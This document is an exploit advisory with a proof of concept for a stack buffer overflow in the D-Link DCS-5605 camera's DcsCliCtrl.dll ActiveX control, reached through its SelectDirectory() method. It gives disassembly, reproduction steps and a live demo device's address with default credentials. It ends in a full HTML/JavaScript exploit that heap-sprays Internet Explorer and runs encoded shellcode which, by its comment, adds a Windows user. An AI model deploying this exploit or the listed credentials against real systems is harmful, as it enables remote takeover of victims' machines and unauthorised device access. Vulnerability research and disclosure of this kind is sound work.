199 lines
No EOL
7.2 KiB
Text
199 lines
No EOL
7.2 KiB
Text
D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control
|
|
DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability
|
|
|
|
tested against: Microsoft Windows Server 2003 r2 sp2
|
|
Internet Explorer 7/8
|
|
|
|
Live demo: http://203.125.227.70/eng/index.cgi
|
|
username: dlink
|
|
password: dlink
|
|
|
|
product homepage: http://www.d-link.com/products/?pid=771
|
|
|
|
product description:
|
|
"The DCS-5605 is a high performance camera for professional surveillance
|
|
and remote monitoring. This network camera features motorized pan,
|
|
tilt, and optical/digital zoom for ultimate versatility. The 10x optical
|
|
zoom lens delivers the level of detail necessary to identify faces, license
|
|
plate numbers, and other important details that are difficult to
|
|
clearly distinguish using digital zoom alone"
|
|
|
|
background:
|
|
When browsing the device web interface, the user
|
|
is asked to install an ActiveX control to stream
|
|
video content. This control has the following settings:
|
|
|
|
Description: Camera Stream Client Control
|
|
File version: 1.0.0.4519
|
|
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
|
|
ProgID: DcsCliCtrl.DCSStrmControl.1
|
|
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
|
|
Implements IObjectSafety: Yes
|
|
Safe For Scripting (IObjectSafety): True
|
|
Safe For Initialization (IObjectSafety): True
|
|
|
|
|
|
Vulnerability:
|
|
the ActiveX control exposes the SelectDirectory()
|
|
method which supports one optional argument.
|
|
See typelib:
|
|
...
|
|
/* DISPID=22 */
|
|
/* VT_BSTR [8] */
|
|
function SelectDirectory(
|
|
/* VT_VARIANT [12] [in] */ $varDefPath
|
|
)
|
|
{
|
|
/* method SelectDirectory */
|
|
}
|
|
...
|
|
|
|
This method suffers of a stack based buffer overflow vulnerability
|
|
because an unsafe lstrcpyW() call inside DcsCliCtrl.dll:
|
|
|
|
|
|
...
|
|
100712E0 81EC 34040000 sub esp,434
|
|
100712E6 A1 2C841010 mov eax,dword ptr ds:[1010842C]
|
|
100712EB 33C4 xor eax,esp
|
|
100712ED 898424 30040000 mov dword ptr ss:[esp+430],eax
|
|
100712F4 53 push ebx
|
|
100712F5 8B9C24 48040000 mov ebx,dword ptr ss:[esp+448]
|
|
100712FC 55 push ebp
|
|
100712FD 8BAC24 40040000 mov ebp,dword ptr ss:[esp+440]
|
|
10071304 56 push esi
|
|
10071305 8BB424 4C040000 mov esi,dword ptr ss:[esp+44C]
|
|
1007130C 57 push edi
|
|
1007130D 8BBC24 4C040000 mov edi,dword ptr ss:[esp+44C]
|
|
10071314 68 08020000 push 208
|
|
10071319 8D4424 34 lea eax,dword ptr ss:[esp+34]
|
|
1007131D 6A 00 push 0
|
|
1007131F 50 push eax
|
|
10071320 E8 0BC40300 call DcsCliCt.100AD730
|
|
10071325 83C4 0C add esp,0C
|
|
10071328 85F6 test esi,esi
|
|
1007132A 74 0C je short DcsCliCt.10071338
|
|
1007132C 56 push esi
|
|
1007132D 8D4C24 34 lea ecx,dword ptr ss:[esp+34]
|
|
10071331 51 push ecx
|
|
10071332 FF15 D4D20C10 call dword ptr ds:[<&KERNEL32.lstrcpyW>] ; kernel32.lstrcpyW <-------------
|
|
...
|
|
|
|
An attacker could entice a remote user to browse a web
|
|
page to gain control of the victim browser, by passing an overlong string to
|
|
the mentioned method and overwriting critical structures (SEH).
|
|
|
|
As attachment proof of concept code.
|
|
|
|
Note, to reproduce the wanted crash:
|
|
when the SelectDirectory() method is called the
|
|
user is asked to select a destination folder for the stream recorder.
|
|
To set EIP to 0x0c0c0c0c select a folder of choice, then proceed.
|
|
When clicking Cancel you have an unuseful crash, however it could be
|
|
possible that modifying the poc you will have EIP overwritten aswell.
|
|
|
|
|
|
I think that it is also possible that other products might carry this dll,
|
|
I could post an update if I find more.
|
|
|
|
Additional note:
|
|
|
|
0:029> lm -vm DcsCliCtrl
|
|
start end module name
|
|
08450000 0859e000 DcsCliCtrl (deferred)
|
|
Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
|
|
Image name: DcsCliCtrl.dll
|
|
Timestamp: Thu Aug 19 08:48:47 2010 (4C6CD3CF)
|
|
CheckSum: 001325EC
|
|
ImageSize: 0014E000
|
|
File version: 1.0.0.4519
|
|
Product version: 1.0.0.1
|
|
File flags: 0 (Mask 3F)
|
|
File OS: 4 Unknown Win32
|
|
File type: 2.0 Dll
|
|
File date: 00000000.00000000
|
|
Translations: 0409.04e4
|
|
ProductName: Camera Streaming Client
|
|
InternalName: DcsCliCtrl.dll
|
|
OriginalFilename: DcsCliCtrl.dll
|
|
ProductVersion: 1.0.0.1
|
|
FileVersion: 1.0.0.4519
|
|
FileDescription: Camera Stream Client Control
|
|
LegalCopyright: Copyright: (c) All rights reserved.
|
|
|
|
|
|
|
|
|
|
<!--
|
|
D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll
|
|
lstrcpyW Remote Buffer Overflow Vulnerability poc
|
|
(ie7)
|
|
|
|
Description: Camera Stream Client Control
|
|
File version: 1.0.0.4519
|
|
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
|
|
ProgID: DcsCliCtrl.DCSStrmControl.1
|
|
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
|
|
Implements IObjectSafety: Yes
|
|
Safe For Scripting (IObjectSafety): True
|
|
Safe For Initialization (IObjectSafety): True
|
|
|
|
rgod
|
|
-->
|
|
<!-- saved from url=(0014)about:internet -->
|
|
<html>
|
|
please select a directory to download ...
|
|
<object classid='clsid:721700FE-7F0E-49C5-BDED-CA92B7CB1245' id='obj' width=0 height=0 />
|
|
</object>
|
|
<script language='javascript'>
|
|
//add user one, user "sun" pass "tzu"
|
|
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
|
|
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
|
|
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
|
|
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
|
|
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
|
|
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
|
|
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
|
|
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
|
|
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
|
|
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
|
|
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
|
|
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
|
|
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
|
|
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
|
|
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
|
|
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
|
|
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
|
|
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
|
|
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
|
|
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
|
|
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
|
|
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
|
|
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
|
|
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
|
|
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
|
|
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
|
|
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
|
|
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
|
|
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
|
|
"%u7734%u4734%u4570");
|
|
bigblock = unescape("%u0c0c%u0c0c");
|
|
headersize = 20;
|
|
slackspace = headersize+shellcode.length;
|
|
while (bigblock.length<slackspace) bigblock+=bigblock;
|
|
fillblock = bigblock.substring(0, slackspace);
|
|
block = bigblock.substring(0, bigblock.length-slackspace);
|
|
while(block.length+slackspace<0x40000) block = block+block+fillblock;
|
|
memory = new Array();
|
|
for (i=0;i<666;i++){memory[i] = block+shellcode}
|
|
</script>
|
|
<script defer=defer>
|
|
var x = "";
|
|
for (i=0; i<200; i++){
|
|
x = x + unescape("%u4141%u4141");
|
|
}
|
|
for (i=0; i<700; i++){
|
|
x = x + unescape("%u0c0c%u0c0c");
|
|
}
|
|
obj.SelectDirectory(x);
|
|
</script> |